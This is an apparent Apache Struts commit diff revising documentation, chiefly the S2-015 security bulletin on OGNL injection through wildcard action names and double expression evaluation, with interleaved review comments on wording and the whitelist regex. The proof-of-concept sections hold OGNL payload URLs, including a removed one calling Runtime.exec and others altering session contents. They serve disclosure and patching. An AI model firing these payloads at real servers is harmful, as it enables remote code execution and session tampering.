Author: lukaszlenart
Date: Wed Jun  5 05:14:58 2013
New Revision: 864455

Log:
Updates draft docs

Added:
    websites/production/struts/content/development/2.x/docs/version-notes-23143.html
Modified:
    websites/production/struts/content/development/2.x/docs/guides.html
    websites/production/struts/content/development/2.x/docs/migration-guide.html
    websites/production/struts/content/development/2.x/docs/s2-015.html
    websites/production/struts/content/development/2.x/docs/security-bulletins.html
    websites/production/struts/content/development/2.x/docs/wildcard-method-selection.html

Modified: websites/production/struts/content/development/2.x/docs/guides.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/guides.html 
(original)
+++ websites/production/struts/content/development/2.x/docs/guides.html Wed Jun 
 5 05:14:58 2013
@@ -353,7 +353,7 @@ under the License. 
 
 <UL>
        <LI><A href="version-notes-2315.html" title="Version Notes 
2.3.15">Version Notes 2.3.15</A> - TBR</LI>
-       <LI><A 
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
 title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A></LI>
+       <LI><A href="version-notes-23143.html" title="Version Notes 
2.3.14.3">Version Notes 2.3.14.3</A></LI>
        <LI><A href="version-notes-23142.html" title="Version Notes 
2.3.14.2">Version Notes 2.3.14.2</A></LI>
        <LI><A href="version-notes-23141.html" title="Version Notes 
2.3.14.1">Version Notes 2.3.14.1</A></LI>
        <LI><A href="version-notes-2314.html" title="Version Notes 
2.3.14">Version Notes 2.3.14</A></LI>

Modified: 
websites/production/struts/content/development/2.x/docs/migration-guide.html
==============================================================================
--- 
websites/production/struts/content/development/2.x/docs/migration-guide.html 
(original)
+++ 
websites/production/struts/content/development/2.x/docs/migration-guide.html 
Wed Jun  5 05:14:58 2013
@@ -130,7 +130,7 @@ under the License. 
 
 <UL>
        <LI><A href="version-notes-2315.html" title="Version Notes 
2.3.15">Version Notes 2.3.15</A> - TBR</LI>
-       <LI><A 
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
 title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A></LI>
+       <LI><A href="version-notes-23143.html" title="Version Notes 
2.3.14.3">Version Notes 2.3.14.3</A></LI>
        <LI><A href="version-notes-23142.html" title="Version Notes 
2.3.14.2">Version Notes 2.3.14.2</A></LI>
        <LI><A href="version-notes-23141.html" title="Version Notes 
2.3.14.1">Version Notes 2.3.14.1</A></LI>
        <LI><A href="version-notes-2314.html" title="Version Notes 
2.3.14">Version Notes 2.3.14</A></LI>
@@ -444,7 +444,7 @@ under the License. 
                           <A href="version-notes-23142.html" title="Version 
Notes 2.3.14.2">Version Notes 2.3.14.2</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
-                          <A 
href="https://cwiki.apache.org/confluence/display/WW/Version%20Notes%202.3.14.3";
 title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A>
+                          <A href="version-notes-23143.html" title="Version 
Notes 2.3.14.3">Version Notes 2.3.14.3</A>
               <SPAN class="smalltext">(Apache Struts 2 Documentation)</SPAN>
               <BR>
                       </DIV>

Modified: websites/production/struts/content/development/2.x/docs/s2-015.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-015.html 
(original)
+++ websites/production/struts/content/development/2.x/docs/s2-015.html Wed Jun 
 5 05:14:58 2013
@@ -126,7 +126,7 @@ under the License. 
           <H2><A name="S2-015-Summary"></A>Summary</H2>
 
 
-<P>A vulnerability introduced by forcing parameter inclusion in the 
<EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command execution, session 
access and manipulation and XSS attacks</P>
+<P>A vulnerability introduced by wildcard matching mechanism or double 
evaluation of OGNL Expression allows remote command execution.</P>
 
 
 <DIV class="table-wrap">
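Review bot: the new Summary sentence is missing its articles; suggest "A vulnerability introduced by the wildcard matching mechanism or by double evaluation of an OGNL expression allows remote command execution." Replacing the old text is the right call, since the removed sentence was the S2-014 summary that had been carried over unchanged, but the bulletins index in security-bulletins.html repeats this sentence verbatim, so whatever wording is settled on here should be applied there in the same commit.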
@@ -145,19 +145,19 @@ under the License. 
 </TR>
 <TR>
 <TH class="confluenceTh">Recommendation</TH>
-<TD class="confluenceTd">Developers should immediately upgrade to <A 
href="http://struts.apache.org/download.cgi#struts23142"; class="external-link" 
rel="nofollow">Struts 2.3.14.2</A></TD>
+<TD class="confluenceTd">Developers should immediately upgrade to <A 
href="http://struts.apache.org/download.cgi#struts23143"; class="external-link" 
rel="nofollow">Struts 2.3.14.3</A></TD>
 </TR>
 <TR>
 <TH class="confluenceTh">Affected Software</TH>
-<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.1 </TD>
+<TD class="confluenceTd"> Struts 2.0.0 - Struts 2.3.14.2 </TD>
 </TR>
 <TR>
 <TH class="confluenceTh">Reporter</TH>
-<TD class="confluenceTd"> Eric Kobrin and Douglas Rodrigues (Akamai), Coverity 
Security Research Laboratory, NSFOCUS Security Team </TD>
+<TD class="confluenceTd"> Jon Passki from Coverity Security Research 
Laboratory reported directly to security@struts.a.o and via <A 
href="https://communities.coverity.com/blogs/security/2013/05/29/struts2-remote-code-execution-via-ognl-injection";
 class="external-link" rel="nofollow">blog post</A> </TD>
 </TR>
 <TR>
 <TH class="confluenceTh">CVE Identifier</TH>
-<TD class="confluenceTd"><A 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2115"; 
class="external-link" rel="nofollow">CVE-2013-2115</A>, <A 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1966"; 
class="external-link" rel="nofollow">CVE-2013-1966</A></TD>
+<TD class="confluenceTd"><A 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2135"; 
class="external-link" rel="nofollow">CVE-2013-2135</A>, <A 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2134"; 
class="external-link" rel="nofollow">CVE-2013-2134</A></TD>
 </TR>
 </TBODY></TABLE>
 </DIV>
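Review bot: the CVE Identifier cell lists CVE-2013-2134 and CVE-2013-2135 without saying which identifier covers which of the two issues described in the Problem section (wildcard action-name matching versus double OGNL evaluation); one short clause per identifier would let readers map each advisory to the fix they need. The Reporter cell uses the shorthand "security@struts.a.o"; a public bulletin should spell out the domain in full. The Affected Software range "Struts 2.0.0 - Struts 2.3.14.2" and the Recommendation (2.3.14.3) now agree with each other, which is the part of this table that matters most.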
@@ -165,73 +165,89 @@ under the License. 
 
 <H2><A name="S2-015-Problem"></A>Problem</H2>
 
-<P>Both the <A 
href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/URL.html";
 class="external-link" rel="nofollow"><EM>s:url</EM></A> and <A 
href="http://struts.apache.org/release/2.3.x/struts2-core/apidocs/org/apache/struts2/components/Anchor.html";
 class="external-link" rel="nofollow"><EM>s:a</EM></A> tag provide an 
<EM>includeParams</EM> attribute. </P>
+<P>Struts 2 allows define action mapping base on wildcards, like in example 
below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;action name=<SPAN 
class="code-quote">&quot;*&quot;</SPAN> class=<SPAN 
class="code-quote">&quot;example.ExampleSupport&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;result&gt;</SPAN>/example/{1}.jsp<SPAN 
class="code-tag">&lt;/result&gt;</SPAN>
+<SPAN class="code-tag">&lt;/action&gt;</SPAN>
+</PRE>
+</DIV></DIV>
 
-<P>The main scope of that attribute is to understand whether includes http 
request parameter or not.  </P>
-
-<P>The allowed values of includeParams are:</P>
-<OL>
-       <LI><EM>none</EM> - include no parameters in the URL (default)</LI>
-       <LI><EM>get</EM> - include only GET parameters in the URL</LI>
-       <LI><EM>all</EM> - include both GET and POST parameters in the URL</LI>
-</OL>
+<P>If a request doesn't match any other defined action, it will be matched by 
<TT>*</TT> and requested action name will be used to load JSP file base on the 
name of action. And as value of {<TT>1</TT>} is threaten as an OGNL expression, 
thus allow to execute arbitrary Java code on server side. This vulnerability is 
combination of two problems:</P>
+<UL class="alternate" type="square">
+       <LI>requested action name isn't escaped or checked agains whitelist</LI>
+       <LI>double evaluation of an OGNL expression in 
<TT>TextParseUtil.translateVariables</TT> when combination of <TT>$</TT> and 
<TT>%</TT> open chars is used.</LI>
+</UL>
 
 
-<P>A request that included a specially crafted request parameter could be used 
to inject arbitrary OGNL code into the stack, afterward used as request 
parameter of an <EM>URL</EM> or <EM>A</EM> tag , which will cause a further 
evaluation. </P>
+<H2><A name="S2-015-Proofofconcept"></A>Proof of concept</H2>
 
-<P>The second evaluation happens when the URL/A tag tries to resolve every 
parameters present in the original request.<BR>
-This lets malicious users put arbitrary OGNL statements into any request 
parameter (not necessarily managed by the code) and have it evaluated as an 
OGNL expression to enable method execution and execute arbitrary methods, 
bypassing Struts and OGNL library protections.</P>
+<H4><A name="S2-015-Wildcardmatching"></A>Wildcard matching</H4>
+<OL>
+       <LI>Run struts2-blank app</LI>
+       <LI>Open the following url, resulting in dynamic action name resolution 
based on passed value of <TT>#foo</TT>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/example/%24%7B%23foo%3D%27Menu%27%2C%23foo%7D</SPAN></PRE>
+</DIV></DIV>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/example/${#foo='Menu',#foo}</SPAN></PRE>
+</DIV></DIV></LI>
+</OL>
 
-<P>The issue was originally addressed by Struts 2.3.14.1 and Security 
Announcement <A href="s2-013.html" title="S2-013">S2&#45;013</A>. However, the 
solution introduced with 2.3.14.1 did not address all possible attack vectors, 
such that <B>every</B> version of Struts 2 before 2.3.14.2 is still vulnerable 
to such attacks.</P>
 
-<H2><A name="S2-015-Proofofconcept"></A>Proof of concept</H2>
+<P>As you can notice, action name is resolved based on user input and you can 
put any arbitrary code to perform attack.</P>
 
+<H4><A name="S2-015-Doubleevaluationofanexpression"></A>Double evaluation of 
an expression</H4>
 <OL>
-       <LI>Open HelloWorld.jsp present in the Struts Blank App and add to one 
of the url/a tag the following parameter:
+       <LI>Open example.xml present in the Struts Blank App and change result 
of HelloWorld action to one below:
 <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
-<PRE class="code-java">
- includeParams=<SPAN class="code-quote">&quot;all&quot;</SPAN>
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;result type=<SPAN 
class="code-quote">&quot;httpheader&quot;</SPAN>&gt;</SPAN>
+    <SPAN class="code-tag">&lt;param name=<SPAN 
class="code-quote">&quot;headers.foobar&quot;</SPAN>&gt;</SPAN>${message}<SPAN 
class="code-tag">&lt;/param&gt;</SPAN>
+<SPAN class="code-tag">&lt;/result&gt;</SPAN>
 </PRE>
-</DIV></DIV>
-<P>Such that the line will be something look like this:</P>
+</DIV></DIV></LI>
+       <LI>Open HelloWorld.java and change <TT>execute()</TT> method as below:
 <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
-<PRE class="code-xml">
-<SPAN class="code-tag">&lt;s:url id=<SPAN 
class="code-quote">&quot;url&quot;</SPAN> action=<SPAN 
class="code-quote">&quot;HelloWorld&quot;</SPAN> includeParams=<SPAN 
class="code-quote">&quot;all&quot;</SPAN>&gt;</SPAN>
+<PRE class="code-java">
+<SPAN class="code-keyword">public</SPAN> <SPAN 
class="code-object">String</SPAN> execute() <SPAN 
class="code-keyword">throws</SPAN> Exception {
+    <SPAN class="code-keyword">return</SPAN> SUCCESS;
+}
 </PRE>
 </DIV></DIV></LI>
        <LI>Run struts2-blank app</LI>
-       <LI>Open the following url, resulting in calc application opening on 
Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
-  <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
-<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=<SPAN
 class="code-keyword">true</SPAN>,@java.lang.<SPAN 
class="code-object">Runtime</SPAN>@getRuntime().exec('calc')}</SPAN></PRE>
-</DIV></DIV></LI>
-       <LI>Open the following url to modify session content:
-  <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
-<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='<SPAN
 class="code-keyword">true</SPAN>'}</SPAN></PRE>
-</DIV></DIV></LI>
-       <LI>Open the following url to print out session content and in 
combination with the previous example introduce arbitrary code into the 
resulting HTML output:
-  <DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
-<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}</SPAN></PRE>
+       <LI>Open the following url (you must have a tool to check response 
headers)
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/example/HelloWorld.action?message=%24{%25{1%2B2}}</SPAN></PRE>
+</DIV></DIV>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-java">http:<SPAN 
class="code-comment">//localhost:8080/example/HelloWorld.action?message=${%{1+2}}</SPAN></PRE>
 </DIV></DIV></LI>
+       <LI>Check value of <TT>foobar</TT> header, it should be <TT>3</TT></LI>
 </OL>
 
 
-<P>As you will notice, in this case, there is no way to escape/sanitize the 
malicious parameter, since it's not an expected parameter and even will not get 
evaluated the request parameters are processed. </P>
+<P>As you can notice, passed value of <TT>message</TT> parameter was used to 
set value of <TT>foobar</TT> header and the value was double evaluated - first 
time when <TT>${message</TT>} was evaluated, secondly when parsed value 
(<TT>${%{1+2</TT>}}) was evaluated again.</P>
 
 <H2><A name="S2-015-Solution"></A>Solution</H2>
 
-<P>The URL rendering subsystem was changed to not pass any parameter name or 
value to OGNL evaluation.</P>
+<P>With the new version actions' names whitelisting was introduced and by 
default is set to accept actions that match the following regex:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-java">[a-z]*[A-Z]*[0-9]*[.\-_!/]*</PRE>
+</DIV></DIV>
+<P>user can change the definition by setting up a new constant in struts.xml 
as below:</P>
+<DIV class="code panel" style="border-width: 1px;"><DIV class="codeContent 
panelContent">
+<PRE class="code-xml">
+<SPAN class="code-tag">&lt;constant name=<SPAN 
class="code-quote">&quot;struts.allowed.action.names&quot;</SPAN> value=<SPAN 
class="code-quote">&quot;[a-zA-Z]*&quot;</SPAN> /&gt;</SPAN>
+</PRE>
+</DIV></DIV>
 
-<P>The MemberAccess component's allowStaticMethodAccess property is now 
immutable.</P>
+<P>Double evaluation of passed expression was removed from 
<TT>OgnlTextParser</TT> which is used by 
<TT>TextParseUtil.translateVariables</TT>.</P>
 
-<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif"; 
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward 
Compatibility</B><BR>A small amount of very elaborated <EM>URL</EM> or 
<EM>A</EM> tag usages depending on the now disabled evaluation might produce 
unexpected results now.<BR>
-Please, ensure that
-<OL>
-       <LI>all expressions that should get evaluated are explicitly introduced 
via <EM>PARAM</EM> tags within <EM>URL</EM> or <EM>A</EM> tags.</LI>
-       <LI>all expressions used in <EM>PARAM</EM> tags come from a sanitized 
input.</LI>
-</OL>
-</TD></TR></TABLE></DIV>
+<DIV class="panelMacro"><TABLE class="noteMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/warning.gif"; 
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>Backward 
Compatibility</B><BR>There should be no problems with migration from previous 
version.</TD></TR></TABLE></DIV>
 
-<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif"; 
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is 
strongly recommended to upgrade to <A 
href="http://struts.apache.org/download.cgi#struts23142"; class="external-link" 
rel="nofollow">Struts 2.3.14.2</A>, which contains the corrected OGNL and XWork 
library.</B></TD></TR></TABLE></DIV>
+<DIV class="panelMacro"><TABLE class="warningMacro"><COLGROUP><COL 
width="24"><COL></COLGROUP><TR><TD valign="top"><IMG 
src="https://cwiki.apache.org/confluence/images/icons/emoticons/forbidden.gif"; 
width="16" height="16" align="absmiddle" alt="" border="0"></TD><TD><B>It is 
strongly recommended to upgrade to <A 
href="http://struts.apache.org/download.cgi#struts23143"; class="external-link" 
rel="nofollow">Struts 2.3.14.3</A>.</B></TD></TR></TABLE></DIV>
         </DIV>
 
         
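Review bot: the default whitelist regex shown in the Solution section, `[a-z]*[A-Z]*[0-9]*[.\-_!/]*`, does not accept the action names used in this very bulletin if it is applied as a full match: it requires every lowercase letter to come before every uppercase letter, which in turn must come before every digit, so `HelloWorld` (lowercase `ello` after uppercase `H`) would be rejected. Either the pattern shipped in the mapper is different and should be copied here verbatim, or this really is the default and applications with camel-case action names will break on upgrade; please check against the code before publishing. Related, the Backward Compatibility box now says there should be no problems with migration, yet an action-name whitelist by construction rejects names containing characters outside the pattern; the box should at least point at `struts.allowed.action.names` (introduced a few lines above) as the way to widen it. Smaller points in the same hunk: "allows define action mapping base on wildcards" should read "allows defining action mappings based on wildcards"; "is threaten as an OGNL expression" should be "is treated as an OGNL expression"; "agains whitelist" should be "against a whitelist"; and the `<TT>` tags in the closing paragraph of the proof of concept should wrap the whole expression (`<TT>${message}</TT>`, `<TT>${%{1+2}}</TT>`) instead of leaving the closing brace outside the tag.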

Modified: 
websites/production/struts/content/development/2.x/docs/security-bulletins.html
==============================================================================
--- 
websites/production/struts/content/development/2.x/docs/security-bulletins.html 
(original)
+++ 
websites/production/struts/content/development/2.x/docs/security-bulletins.html 
Wed Jun  5 05:14:58 2013
@@ -124,7 +124,7 @@ under the License. 
       <DIV class="pagecontent">
         <DIV class="wiki-content">
           <P>The following security bulletins are available:</P>
-<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> &mdash; <SPAN 
class="smalltext">Remote code exploit on form validation 
error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> &mdash; 
<SPAN class="smalltext">Cross site scripting (XSS) vulnerability on 
&lt;s:url&gt; and &lt;s:a&gt; tags</SPAN></LI><LI><A href="s2-003.html" 
title="S2-003">S2-003</A> &mdash; <SPAN class="smalltext">XWork 
ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A 
href="s2-004.html" title="S2-004">S2-004</A> &mdash; <SPAN 
class="smalltext">Directory traversal vulnerability while serving static 
content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> &mdash; 
<SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote 
command execution</SPAN></LI><LI><A href="s2-006.html" 
title="S2-006">S2-006</A> &mdash; <SPAN class="smalltext">Multiple Cross-Site 
Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A 
href="s2-007.html" t
 itle="S2-007">S2-007</A> &mdash; <SPAN class="smalltext">User input is 
evaluated as an OGNL expression when there's a conversion 
error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> &mdash; 
<SPAN class="smalltext">Multiple critical vulnerabilities in 
Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> &mdash; 
<SPAN class="smalltext">ParameterInterceptor vulnerability allows remote 
command execution</SPAN></LI><LI><A href="s2-010.html" 
title="S2-010">S2-010</A> &mdash; <SPAN class="smalltext">When using Struts 2 
token mechanism for CSRF protection, token check may be bypassed by misusing 
known session attributes</SPAN></LI><LI><A href="s2-011.html" 
title="S2-011">S2-011</A> &mdash; <SPAN class="smalltext">Long request 
parameter names might significantly promote the effectiveness of DOS 
attacks</SPAN></LI><LI><A href="s2-012.html" title="S2-012">S2-012</A> &mdash; 
<SPAN class="smalltext">Showcase app vulnerability allows remote command execut
 ion</SPAN></LI><LI><A href="s2-013.html" title="S2-013">S2-013</A> &mdash; 
<SPAN class="smalltext">A vulnerability, present in the <EM>includeParams</EM> 
attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command 
execution</SPAN></LI><LI><A href="s2-014.html" title="S2-014">S2-014</A> 
&mdash; <SPAN class="smalltext">A vulnerability introduced by forcing parameter 
inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command 
execution, session access and manipulation and XSS attacks</SPAN></LI><LI><A 
href="s2-015.html" title="S2-015">S2-015</A> &mdash; <SPAN class="smalltext">A 
vulnerability introduced by wildcard matching mechanism or double evaluation of 
OGNL Expression allows remote command execution</SPAN></LI></UL>
+<UL><LI><A href="s2-001.html" title="S2-001">S2-001</A> &mdash; <SPAN 
class="smalltext">Remote code exploit on form validation 
error</SPAN></LI><LI><A href="s2-002.html" title="S2-002">S2-002</A> &mdash; 
<SPAN class="smalltext">Cross site scripting (XSS) vulnerability on 
&lt;s:url&gt; and &lt;s:a&gt; tags</SPAN></LI><LI><A href="s2-003.html" 
title="S2-003">S2-003</A> &mdash; <SPAN class="smalltext">XWork 
ParameterInterceptors bypass allows OGNL statement execution</SPAN></LI><LI><A 
href="s2-004.html" title="S2-004">S2-004</A> &mdash; <SPAN 
class="smalltext">Directory traversal vulnerability while serving static 
content</SPAN></LI><LI><A href="s2-005.html" title="S2-005">S2-005</A> &mdash; 
<SPAN class="smalltext">XWork ParameterInterceptors bypass allows remote 
command execution</SPAN></LI><LI><A href="s2-006.html" 
title="S2-006">S2-006</A> &mdash; <SPAN class="smalltext">Multiple Cross-Site 
Scripting (XSS) in XWork generated error pages</SPAN></LI><LI><A 
href="s2-007.html" t
 itle="S2-007">S2-007</A> &mdash; <SPAN class="smalltext">User input is 
evaluated as an OGNL expression when there's a conversion 
error</SPAN></LI><LI><A href="s2-008.html" title="S2-008">S2-008</A> &mdash; 
<SPAN class="smalltext">Multiple critical vulnerabilities in 
Struts2</SPAN></LI><LI><A href="s2-009.html" title="S2-009">S2-009</A> &mdash; 
<SPAN class="smalltext">ParameterInterceptor vulnerability allows remote 
command execution</SPAN></LI><LI><A href="s2-010.html" 
title="S2-010">S2-010</A> &mdash; <SPAN class="smalltext">When using Struts 2 
token mechanism for CSRF protection, token check may be bypassed by misusing 
known session attributes</SPAN></LI><LI><A href="s2-011.html" 
title="S2-011">S2-011</A> &mdash; <SPAN class="smalltext">Long request 
parameter names might significantly promote the effectiveness of DOS 
attacks</SPAN></LI><LI><A href="s2-012.html" title="S2-012">S2-012</A> &mdash; 
<SPAN class="smalltext">Showcase app vulnerability allows remote command execut
 ion</SPAN></LI><LI><A href="s2-013.html" title="S2-013">S2-013</A> &mdash; 
<SPAN class="smalltext">A vulnerability, present in the <EM>includeParams</EM> 
attribute of the <EM>URL</EM> and <EM>Anchor</EM> Tag, allows remote command 
execution</SPAN></LI><LI><A href="s2-014.html" title="S2-014">S2-014</A> 
&mdash; <SPAN class="smalltext">A vulnerability introduced by forcing parameter 
inclusion in the <EM>URL</EM> and <EM>Anchor</EM> Tag allows remote command 
execution, session access and manipulation and XSS attacks</SPAN></LI><LI><A 
href="s2-015.html" title="S2-015">S2-015</A> &mdash; <SPAN class="smalltext">A 
vulnerability introduced by wildcard matching mechanism or double evaluation of 
OGNL Expression allows remote command execution.</SPAN></LI></UL>
         </DIV>
 
                   <DIV class="tabletitle">
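Review bot: the only change in this hunk is the trailing period added to the S2-015 entry ("allows remote command execution."); none of the other fourteen entries end with a period, so either drop it here or add one to every entry. Since this list repeats each bulletin's Summary, the simplest fix is to remove the period from the Summary in s2-015.html as well so both stay consistent with the rest of the list.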

Added: 
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
==============================================================================
--- 
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
 (added)
+++ 
websites/production/struts/content/development/2.x/docs/version-notes-23143.html
 Wed Jun  5 05:14:58 2013
@@ -0,0 +1,206 @@
+
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE- 2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" 
"http://www.w3.org/TR/html4/loose.dtd";>
+<HTML>
+  <HEAD>
+    <LINK type="text/css" rel="stylesheet" 
href="https://struts.apache.org/css/default.css";>
+    <STYLE type="text/css">
+      .dp-highlighter {
+        width:95% !important;
+      }
+    </STYLE>
+    <STYLE type="text/css">
+      .footer {
+        background-image:      
url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+        background-repeat:     repeat-x;
+        background-position:   left top;
+        padding-top:           4px;
+        color:                 #666;
+      }
+    </STYLE>
+    <SCRIPT type="text/javascript" language="javascript">
+      var hide = null;
+      var show = null;
+      var children = null;
+
+      function init() {
+        /* Search form initialization */
+        var form = document.forms['search'];
+        if (form != null) {
+          form.elements['domains'].value = location.hostname;
+          form.elements['sitesearch'].value = location.hostname;
+        }
+
+        /* Children initialization */
+        hide = document.getElementById('hide');
+        show = document.getElementById('show');
+        children = document.all != null ?
+                   document.all['children'] :
+                   document.getElementById('children');
+        if (children != null) {
+          children.style.display = 'none';
+          show.style.display = 'inline';
+          hide.style.display = 'none';
+        }
+      }
+
+      function showChildren() {
+        children.style.display = 'block';
+        show.style.display = 'none';
+        hide.style.display = 'inline';
+      }
+
+      function hideChildren() {
+        children.style.display = 'none';
+        show.style.display = 'inline';
+        hide.style.display = 'none';
+      }
+    </SCRIPT>
+    <TITLE>Version Notes 2.3.14.3</TITLE>
+  <META http-equiv="Content-Type" content="text/html;charset=UTF-8"></HEAD>
+  <BODY onload="init()">
+    <TABLE border="0" cellpadding="2" cellspacing="0" width="100%">
+      <TR class="topBar">
+        <TD align="left" valign="middle" class="topBarDiv" align="left" 
nowrap="">
+          &nbsp;<A href="home.html" title="Apache Struts 2 
Documentation">Apache Struts 2 Documentation</A>&nbsp;&gt;&nbsp;<A 
href="home.html" title="Home">Home</A>&nbsp;&gt;&nbsp;<A href="guides.html" 
title="Guides">Guides</A>&nbsp;&gt;&nbsp;<A href="migration-guide.html" 
title="Migration Guide">Migration Guide</A>&nbsp;&gt;&nbsp;<A href="" 
title="Version Notes 2.3.14.3">Version Notes 2.3.14.3</A>
+        </TD>
+        <TD align="right" valign="middle" nowrap="">
+          <FORM name="search" action="http://www.google.com/search"; 
method="get">
+            <INPUT type="hidden" name="ie" value="UTF-8">
+            <INPUT type="hidden" name="oe" value="UTF-8">
+            <INPUT type="hidden" name="domains" value="">
+            <INPUT type="hidden" name="sitesearch" value="">
+            <INPUT type="text" name="q" maxlength="255" value="">        
+            <INPUT type="submit" name="btnG" value="Google Search">
+          </FORM>
+        </TD>
+      </TR> 
+    </TABLE>
+
+    <DIV id="PageContent">
+      <DIV class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the 
logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; 
margin: 4px 4px 4px 10px;" border="0"-->
+        <DIV style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 
2 Documentation</DIV>
+        <DIV style="margin: 0px 10px 8px 10px" class="pagetitle">Version Notes 
2.3.14.3</DIV>
+
+        <DIV class="greynavbar" align="right" style="padding: 2px 10px; 
margin: 0px;">
+          <A 
href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31823655";>
+            <IMG 
src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"; height="16" 
width="16" border="0" align="absmiddle" title="Edit Page"></A>
+            <A 
href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=31823655";>Edit
 Page</A>
+          &nbsp;
+          <A 
href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW";>
+            <IMG 
src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"; 
height="16" width="16" border="0" align="absmiddle" title="Browse Space"></A>
+            <A 
href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW";>Browse 
Space</A>
+          &nbsp;
+          <A 
href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31823655";>
+            <IMG 
src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"; 
height="16" width="16" border="0" align="absmiddle" title="Add Page"></A>
+          <A 
href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=31823655";>Add
 Page</A>
+          &nbsp;
+          <A 
href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31823655";>
+            <IMG 
src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"; 
height="16" width="16" border="0" align="absmiddle" title="Add News"></A>
+          <A 
href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=31823655";>Add
 News</A>
+        </DIV>
